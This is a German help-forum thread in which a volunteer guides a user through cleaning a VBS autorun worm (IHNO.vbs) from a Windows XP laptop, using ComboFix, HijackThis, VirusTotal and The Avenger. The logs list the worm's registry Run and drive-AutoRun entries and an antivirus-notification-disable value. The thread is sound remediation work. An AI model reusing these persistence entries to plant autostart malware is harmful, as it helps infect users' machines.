tools\msconfig\startupreg\ICQ Lite] C:\Programme\ICQLite\ICQLite.exe [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LogitechCameraService(E)] --------- 2004-11-01 18:22 262144 C:\WINDOWS\system32\ElkCtrl.exe [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ntiMUI] --a------ 2006-05-15 11:15 45056 C:\Programme\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Picasa Media Detector] --a------ 2007-10-23 22:18 443968 C:\Programme\Picasa2\PicasaMediaDetector.exe [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task] --a------ 2008-03-28 23:37 413696 C:\Programme\QuickTime\qttask.exe [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RealTray] C:\Programme\Real\RealPlayer\RealPlay.exe [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\S7UB Start] C:\Programme\Gemeinsame Dateien\Siemens\S7ubtoox\s7ubtstx.exe [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skype] -ra------ 2007-09-13 13:31 22880040 C:\Programme\Skype\Phone\Skype.exe [HKEY_LOCAL_MACHINE\software\microsoft\security center] "AntiVirusDisableNotify"=dword:00000001 [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"= "C:\\Programme\\uTorrent\\utorrent.exe"= "C:\Programme\Microsoft ActiveSync\rapimgr.exe"= C:\Programme\Microsoft ActiveSync\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager "C:\Programme\Microsoft ActiveSync\wcescomm.exe"= C:\Programme\Microsoft ActiveSync\wcescomm.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Connection Manager "C:\Programme\Microsoft ActiveSync\WCESMgr.exe"= C:\Programme\Microsoft ActiveSync\WCESMgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Application "%windir%\\Network Diagnostic\\xpnetdiag.exe"= "C:\\Programme\\Messenger\\msmsgs.exe"= "D:\\System\\UT2004.exe"= "C:\\Programme\\ICQ6\\ICQ.exe"= "C:\\Programme\\iTunes\\iTunes.exe"= "C:\\Programme\\Skype\\Phone\\Skype.exe"= "C:\\Programme\\Microsoft Office\\Office12\\OUTLOOK.EXE"= "C:\\Programme\\Microsoft Office\\Office12\\GROOVE.EXE"= "C:\\Programme\\Microsoft Office\\Office12\\ONENOTE.EXE"= [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List] "26675:TCP"= 26675:TCP:169.254.2.0/255.255.255.0:Enabled:ActiveSync Service "3389:TCP"= 3389:TCP:@xpsp2res.dll,-22009 R1 OsaFsLoc;OsaFsLoc;C:\WINDOWS\system32\drivers\OsaFsLoc.sys [2005-10-15 18:20] R1 sdcplh;sdcplh;C:\WINDOWS\system32\drivers\sdcplh.sys [2006-02-14 16:39] R2 almservice;Automation License Manager Service;"C:\Programme\Gemeinsame Dateien\Siemens\sws\almsrv\almsrvx.exe" [2005-07-21 11:40] R2 EpmPsd;Acer EPM Power Scheme Driver;C:\WINDOWS\system32\drivers\epm-psd.sys [2006-01-23 12:41] R2 EpmShd;Acer EPM System Hardware Driver;C:\WINDOWS\system32\drivers\epm-shd.sys [2006-01-23 12:41] R2 int15.sys;int15.sys;C:\Acer\Empowering Technology\eRecovery\int15.sys [2005-01-13 14:46] R2 osaio;osaio;C:\WINDOWS\system32\drivers\osaio.sys [2005-06-30 16:58] R2 osanbm;osanbm;C:\WINDOWS\system32\drivers\osanbm.sys [2005-01-14 15:57] R2 scpdrv;scpdrv;C:\Programme\Gemeinsame Dateien\Siemens\SWS\PlugIns\SCP\scpdrv.sys [2003-10-14 01:44] R3 lv321av;Logitech USB PC Camera (VC0321);C:\WINDOWS\system32\DRIVERS\lv321av.sys [2006-06-19 12:20] R3 LVPrcMon;Logitech LVPrcMon Driver;C:\WINDOWS\system32\drivers\LVPrcMon.sys [2006-06-23 10:40] R3 NdisFilt;OSA NdisFilter Protocol;C:\WINDOWS\system32\Drivers\NdisFilt.sys [2005-09-13 15:34] S3 2b3e3e6d-9b2d-4a5e-8161-e949d3bce64d;2b3e3e6d-9b2d-4a5e-8161-e949d3bce64d;E:\Player\cds300.dll [] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\F] \Shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe IHNO.vbs [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{7dc50636-8e06-11db-9c9d-00059a3c7800}] \Shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe KARL-HEINZ.vbs [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{f57d4b06-820e-11db-9c50-001302569953}] \Shell\AutoRun\command - G:\f.bat \Shell\explore\Command - G:\f.bat \Shell\open\Command - G:\f.bat . Inhalt des "geplante Tasks" Ordners "2007-11-25 15:53:54 C:\WINDOWS\Tasks\AppleSoftwareUpdate.job" - C:\Programme\Apple Software Update\SoftwareUpdate.exe . ************************************************************************** catchme 0.3.1361 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net Rootkit scan 2008-06-19 15:36:07 Windows 5.1.2600 Service Pack 2 FAT NTAPI Scanne versteckte Prozesse... Scanne versteckte Autostart Eintr„ge... Scanne versteckte Dateien... Scan erfolgreich abgeschlossen versteckte Dateien: 0 ************************************************************************** . ------------------------ Other Running Processes ------------------------ . C:\PROGRAMME\INTEL\WIRELESS\BIN\EVTENG.EXE C:\PROGRAMME\INTEL\WIRELESS\BIN\S24EVMON.EXE C:\PROGRAMME\GEMEINSAME DATEIEN\LOGITECH\LVMVFM\LVPRCSRV.EXE C:\PROGRAMME\ANTIVIR PERSONALEDITION CLASSIC\AVGUARD.EXE C:\PROGRAMME\ANTIVIR PERSONALEDITION CLASSIC\SCHED.EXE C:\PROGRAMME\GEMEINSAME DATEIEN\APPLE\MOBILE DEVICE SUPPORT\BIN\APPLEMOBILEDEVICESERVICE.EXE C:\Acer\Empowering Technology\admServ.exe C:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe C:\Programme\Cisco Systems\VPN Client\cvpnd.exe C:\WINDOWS\eHome\ehRecvr.exe C:\WINDOWS\eHome\ehSched.exe C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe C:\WINDOWS\system32\nvsvc32.exe C:\Programme\Intel\Wireless\Bin\RegSrvc.exe C:\WINDOWS\ehome\mcrdsvc.exe C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\PROGRAMME\LAUNCH MANAGER\LMANAGER.EXE C:\WINDOWS\SYSTEM32\NOTEPAD.EXE C:\PROGRAMME\WIDCOMM\BLUETOOTH SOFTWARE\BTTRAY.EXE C:\PROGRAMME\MICROSOFT ACTIVESYNC\RAPIMGR.EXE C:\DOKUME~1\ihno\LOKALE~1\Temp\RtkBtMnt.exe C:\Programme\iPod\bin\iPodService.exe C:\WINDOWS\system32\wbem\unsecapp.exe C:\Programme\AntiVir PersonalEdition Classic\avnotify.exe . ************************************************************************** . Zeit der Fertigstellung: 2008-06-19 15:39:35 - machine was rebooted ComboFix-quarantined-files.txt 2008-06-19 13:39:30 18 Verzeichnis(se), 7,176,749,056 Bytes frei 24 Verzeichnis(se), 9,656,172,544 Bytes frei 238 --- E O F --- 2008-06-13 16:16:12 |
Und hier das von HijackThis: Logfile of Trend Micro HijackThis v2.0.2 [edit] bitte editiere zukünftig deine links, wie es dir u.a. hier angezeigt wird: http://www.trojaner-board.de/22771-a...tml#post171958 danke GUA http://www.smilies.4-user.de/include...lie_be_027.gif [/edit] |
Bitte editiere deine Links in deinen Logfiles einfach:daumenhoc Bitte stell ein neues Logfile rein (MIT EDITIERTEN LINKS) Lade bitte folgende Dateien bei VirusTotal hoch und poste das Ergebnis: C:\WINDOWS\IME\imjp8_1\IMJPMIG.exe |
Oh, entschuldigung... Also, hier nochmal: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 15:39:28, on 19.06.2008 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16674) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\Programme\Intel\Wireless\Bin\EvtEng.exe C:\Programme\Intel\Wireless\Bin\S24EvMon.exe C:\WINDOWS\system32\spoolsv.exe c:\programme\gemeinsame dateien\logitech\lvmvfm\LVPrcSrv.exe C:\Programme\AntiVir PersonalEdition Classic\avguard.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\ehome\ehtray.exe C:\WINDOWS\RTHDCPL.EXE C:\Programme\Synaptics\SynTP\SynTPEnh.exe C:\Acer\Empowering Technology\admtray.exe C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe C:\WINDOWS\system32\RUNDLL32.EXE C:\Acer\Empowering Technology\ePower\ePower_DMC.exe C:\PROGRA~1\LAUNCH~1\LManager.exe C:\Acer\Empowering Technology\eRecovery\Monitor.exe C:\WINDOWS\system32\LVCOMSX.EXE C:\Programme\Acer\OrbiCam\CameraAssistant.exe C:\Programme\Java\jre1.6.0_05\bin\jusched.exe C:\Programme\ScanSoft\OmniPageSE4.0\OpwareSE4.exe C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe C:\Programme\Adobe\Reader 8.0\Reader\Reader_sl.exe C:\Programme\AntiVir PersonalEdition Classic\sched.exe C:\Programme\iTunes\iTunesHelper.exe C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe C:\Programme\Microsoft Office\Office12\GrooveMonitor.exe C:\WINDOWS\system32\ctfmon.exe C:\Programme\Microsoft ActiveSync\wcescomm.exe C:\Acer\Empowering Technology\admServ.exe C:\PROGRA~1\MICROS~3\rapimgr.exe c:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe C:\Programme\Cisco Systems\VPN Client\cvpnd.exe C:\WINDOWS\eHome\ehRecvr.exe C:\Programme\WIDCOMM\Bluetooth Software\BTTray.exe C:\WINDOWS\eHome\ehSched.exe C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe C:\WINDOWS\system32\nvsvc32.exe C:\Programme\Intel\Wireless\Bin\RegSrvc.exe C:\DOKUME~1\ihno\LOKALE~1\Temp\RtkBtMnt.exe C:\WINDOWS\system32\svchost.exe C:\Programme\Gemeinsame Dateien\Siemens\sws\almsrv\almsrvx.exe C:\Programme\iPod\bin\iPodService.exe C:\WINDOWS\system32\wbem\unsecapp.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\wuauclt.exe C:\Programme\Mozilla Firefox\firefox.exe C:\Dokumente und Einstellungen\ihno\Desktop\HiJackThis.exe R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = h**p://go.microsoft.com/fwlink/?LinkId=69157]MSN.com R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = h**p://go.microsoft.com/fwlink/?LinkId=54896]Live Search R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =h**p://go.microsoft.com/fwlink/?LinkId=54896]Live Search O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Gemeinsame Dateien\Adobe\Acrobat\ActiveX\AcroIEHelper.dll O2 - BHO: Canon Easy Web Print Helper - {68F9551E-0411-48E4-9AAF-4BC42A6A46BE} - C:\Programme\Canon\Easy-WebPrint\EWPBrowseLoader.dll O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~2\Office12\GRA8E1~1.DLL O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll O2 - BHO: (no name) - {7C279A11-087C-4BF2-BE9D-990D6E9E7F59} - C:\WINDOWS\system32\rasdlg32.dll (file missing) O3 - Toolbar: Acer eDataSecurity Management - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Programme\Canon\Easy-WebPrint\Toolband.dll O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent O4 - HKLM\..\Run: [ehTray] C:\WINDOWS\ehome\ehtray.exe O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE O4 - HKLM\..\Run: [AzMixerSel] C:\Programme\Realtek\InstallShield\AzMixerSel.exe O4 - HKLM\..\Run: [SynTPEnh] C:\Programme\Synaptics\SynTP\SynTPEnh.exe O4 - HKLM\..\Run: [ADMTray.exe] "C:\Acer\Empowering Technology\admtray.exe" O4 - HKLM\..\Run: [eDataSecurity Loader] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32 O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit O4 - HKLM\..\Run: [ePower_DMC] C:\Acer\Empowering Technology\ePower\ePower_DMC.exe O4 - HKLM\..\Run: [Acer ePower Management] C:\Acer\Empowering Technology\ePower\Acer ePower Management.exe boot O4 - HKLM\..\Run: [LManager] C:\PROGRA~1\LAUNCH~1\LManager.exe O4 - HKLM\..\Run: [eRecoveryService] C:\Acer\Empowering Technology\eRecovery\Monitor.exe O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE O4 - HKLM\..\Run: [LogitechCameraAssistant] C:\Programme\Acer\OrbiCam\CameraAssistant.exe O4 - HKLM\..\Run: [LogitechVideo[inspector]] C:\Programme\Acer\OrbiCam\InstallHelper.exe /inspect O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programme\Java\jre1.6.0_05\bin\jusched.exe" O4 - HKLM\..\Run: [LaunchApp] Alaunch O4 - HKLM\..\Run: [SSBkgdUpdate] "C:\Programme\Gemeinsame Dateien\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe" -Embedding -boot O4 - HKLM\..\Run: [OpwareSE4] "C:\Programme\ScanSoft\OmniPageSE4.0\OpwareSE4.exe" O4 - HKLM\..\Run: [avgnt] "C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe" /min O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Programme\Adobe\Reader 8.0\Reader\Reader_sl.exe" O4 - HKLM\..\Run: [QuickTime Task] "C:\Programme\QuickTime\QTTask.exe" -atboottime O4 - HKLM\..\Run: [iTunesHelper] "C:\Programme\iTunes\iTunesHelper.exe" O4 - HKLM\..\Run: [GrooveMonitor] "C:\Programme\Microsoft Office\Office12\GrooveMonitor.exe" O4 - HKLM\..\Run: [IHNO] C:\WINDOWS\SYSTEM32\IHNO.vbs O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Programme\Microsoft ActiveSync\wcescomm.exe" O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKALER DIENST') O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETZWERKDIENST') O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user') O4 - Global Startup: BTTray.lnk = ? O4 - Global Startup: VPN Client.lnk = ? O8 - Extra context menu item: Easy-WebPrint - Drucken - res://C:\Programme\Canon\Easy-WebPrint\Toolband.dll/RC_Print.html O8 - Extra context menu item: Easy-WebPrint - Schnelldruck - res://C:\Programme\Canon\Easy-WebPrint\Toolband.dll/RC_HSPrint.html O8 - Extra context menu item: Easy-WebPrint - Vorschau - res://C:\Programme\Canon\Easy-WebPrint\Toolband.dll/RC_Preview.html O8 - Extra context menu item: Easy-WebPrint - Zu Druckliste hinzufügen - res://C:\Programme\Canon\Easy-WebPrint\Toolband.dll/RC_AddToList.html O8 - Extra context menu item: Senden an &Bluetooth-Gerät... - c:\Programme\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.6.0_05\bin\ssv.dll O9 - Extra button: An OneNote senden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll O9 - Extra 'Tools' menuitem: An OneNote s&enden - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\INetRepl.dll O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\INetRepl.dll O9 - Extra 'Tools' menuitem: Mobilen Favoriten erstellen... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\INetRepl.dll O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL O9 - Extra button: (no name) - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - (no file) O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe (file missing) O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe (file missing) O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Programme\ICQ6\ICQ.exe O9 - Extra 'Tools' menuitem: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Programme\ICQ6\ICQ.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programme\Messenger\msmsgs.exe O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - h**p://go.microsoft.com/fwlink/?linkid=39204 O16 - DPF: {59136DB4-6CA3-4B40-8F2F-BBF84B6F1E91} (Attachment Upload Control) - h**ps://stream.web.de/mail/activex/mail_upload_11213.cab O18 - Protocol: CDS300 - {AD43AA67-6860-4531-AC8A-0E68F9CF023E} - E:\Player\__CDS2.dll (file missing) O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~2\Office12\GR99D3~1.DLL O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL O23 - Service: Automation License Manager Service (almservice) - SIEMENS AG - C:\Programme\Gemeinsame Dateien\Siemens\sws\almsrv\almsrvx.exe O23 - Service: AntiVir PersonalEdition Classic Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\sched.exe O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\avguard.exe O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Programme\Gemeinsame Dateien\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe O23 - Service: AdminWorks Agent X6 (AWService) - Avocent Inc. - C:\Acer\Empowering Technology\admServ.exe O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - c:\Programme\WIDCOMM\Bluetooth Software\bin\btwdins.exe O23 - Service: Cisco Systems, Inc. VPN Service (CVPND) - Cisco Systems, Inc. - C:\Programme\Cisco Systems\VPN Client\cvpnd.exe O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\EvtEng.exe O23 - Service: Google Updater Service (gusvc) - Google - C:\Programme\Google\Common\Google Updater\GoogleUpdaterService.exe O23 - Service: iPod-Dienst (iPod Service) - Apple Inc. - C:\Programme\iPod\bin\iPodService.exe O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Programme\Gemeinsame Dateien\LightScribe\LSSrvc.exe O23 - Service: Logitech Process Monitor (LVPrcSrv) - Logitech - c:\programme\gemeinsame dateien\logitech\lvmvfm\LVPrcSrv.exe O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\RegSrvc.exe O23 - Service: Remote Packet Capture Protocol v.0 (experimental) (rpcapd) - CACE Technologies - C:\Programme\WinPcap\rpcapd.exe O23 - Service: Intel(R) PROSet/Wireless Service (S24EventMonitor) - Intel Corporation - C:\Programme\Intel\Wireless\Bin\S24EvMon.exe -- End of file - 12608 bytes |
Und jetzt das Ergebnis von VirusTotal: Antivirus Version letzte aktualisierung Ergebnis AhnLab-V3 2008.6.19.0 2008.06.20 - AntiVir 7.8.0.59 2008.06.20 - Authentium 5.1.0.4 2008.06.20 - Avast 4.8.1195.0 2008.06.19 - AVG 7.5.0.516 2008.06.19 - BitDefender 7.2 2008.06.20 - CAT-QuickHeal 9.50 2008.06.19 - ClamAV 0.93.1 2008.06.20 - DrWeb 4.44.0.09170 2008.06.20 - eSafe 7.0.15.0 2008.06.19 - eTrust-Vet 31.6.5890 2008.06.20 - Ewido 4.0 2008.06.20 - F-Prot 4.4.4.56 2008.06.19 - Fortinet 3.14.0.0 2008.06.20 - GData 2.0.7306.1023 2008.06.20 - Ikarus T3.1.1.26.0 2008.06.20 - Kaspersky 7.0.0.125 2008.06.20 - McAfee 5321 2008.06.19 - Microsoft 1.3604 2008.06.20 - NOD32v2 3203 2008.06.20 - Panda 9.0.0.4 2008.06.19 - Prevx1 V2 2008.06.20 - Rising 20.49.42.00 2008.06.20 - Sophos 4.30.0 2008.06.20 - Sunbelt 3.0.1153.1 2008.06.15 - Symantec 10 2008.06.20 - TheHacker 6.2.92.355 2008.06.19 - TrendMicro 8.700.0.1004 2008.06.20 - VBA32 3.12.6.7 2008.06.19 - VirusBuster 4.3.26:9 2008.06.12 - Webwasher-Gateway 6.6.2 2008.06.20 - |
Ok Bitte fixe mit Hijackthis folgende Einträge: O2 - BHO: (no name) - {7C279A11-087C-4BF2-BE9D-990D6E9E7F59} - C:\WINDOWS\system32\rasdlg32.dll (file missing) O4 - HKLM\..\Run: [IHNO] C:\WINDOWS\SYSTEM32\IHNO.vbs O9 - Extra button: (no name) - {B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} - (no file) O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe (file missing) O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Programme\ICQLite\ICQLite.exe (file missing) Bitte lade folgende Datei bei Virustotal hoch: C:\WINDOWS\SYSTEM32\IHNO.vbs Bitte schicke diese Datei hier hin und warte die Resultate ab (sobald du Bescheid bekommst bitte das Ergebnis posten): C:\WINDOWS\IME\imjp8_1\IMJPMIG.exe |
Vielen vielen Dank, du nimmst mich ja richtig an die Hand:Boogie: Also beim Dateiupload von Antivir stand, dass C:\WINDOWS\IME\imjp8_1\IMJPMIG.exe eine Datei von Windows XP SP2 wäre und dass diese "KNOWN CLEAN" sei. Das Ergebnis von VirusTotal::snyper: Antivirus Version letzte aktualisierung Ergebnis AhnLab-V3 2008.6.19.0 2008.06.20 VBS/Solow AntiVir 7.8.0.59 2008.06.20 HEUR/HTML.Malware Authentium 5.1.0.4 2008.06.20 VBS/Solow.A Avast 4.8.1195.0 2008.06.20 VBS:Solow-C AVG 7.5.0.516 2008.06.20 VBS/Small BitDefender 7.2 2008.06.20 Generic.ScriptWorm.082305E2 CAT-QuickHeal 9.50 2008.06.20 VBS/IETitle ClamAV 0.93.1 2008.06.20 - DrWeb 4.44.0.09170 2008.06.20 VBS.Generic.582 eSafe 7.0.15.0 2008.06.19 - eTrust-Vet 31.6.5890 2008.06.20 VBS/Slogod Ewido 4.0 2008.06.20 - F-Prot 4.4.4.56 2008.06.19 VBS/Solow.A F-Secure 7.60.13501.0 2008.06.20 Virus.VBS.AutoRun.au Fortinet 3.14.0.0 2008.06.20 - GData 2.0.7306.1023 2008.06.20 Virus.VBS.AutoRun.au Ikarus T3.1.1.26.0 2008.06.20 Virus.VBS.AutoRun.c Kaspersky 7.0.0.125 2008.06.20 Virus.VBS.AutoRun.au McAfee 5322 2008.06.20 VBS/IE-Title Microsoft 1.3604 2008.06.20 Worm:VBS/Slogod.F NOD32v2 3204 2008.06.20 VBS/Butsur.E Norman 5.80.02 2008.06.20 VBS/Solow.I Panda 9.0.0.4 2008.06.20 VBS/Solow.AC.worm Prevx1 V2 2008.06.20 - Rising 20.49.42.00 2008.06.20 Worm.VBS.Sowel.a Sophos 4.30.0 2008.06.20 VBS/Solow-Gen Sunbelt 3.0.1153.1 2008.06.15 - Symantec 10 2008.06.20 VBS.Runauto TheHacker 6.2.92.355 2008.06.19 - TrendMicro 8.700.0.1004 2008.06.20 VBS_SOLOW.AK VBA32 3.12.6.7 2008.06.19 - VirusBuster 4.3.26:9 2008.06.12 VBS.Niric.B Webwasher-Gateway 6.6.2 2008.06.20 Heuristic.HTML.Malware |
Sehr gut:daumenhoc Nun wendest du folgendes an: Du holst dir The Avenger (link in meiner Signatur) und gibst im weissen feld folgenden text ein: Zitat:
|
Also hier die log-Datei: Logfile of The Avenger Version 2.0, (c) by Swandog46 h**p://swandog46.geekstogo.com Platform: Windows XP ******************* Script file opened successfully. Script file read successfully. Backups directory opened successfully at C:\Avenger ******************* Beginning to process script file: Rootkit scan active. No rootkits found! File "C:\WINDOWS\SYSTEM32\IHNO.vbs" deleted successfully. Completed script processing. ******************* Finished! Terminate. Auf die Festplatten komme ich schonmal wieder via Doppelklick und das Editior-Fenster mit dem gruseligen Text taucht auch nicht mehr auf beim hochfahren (das allerdings schon seit heute morgen..):aplaus: Danke, dass du dich meinem Problem annimmst!:daumenhoc:daumenhoc |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 10:12 Uhr. |
Copyright ©2000-2025, Trojaner-Board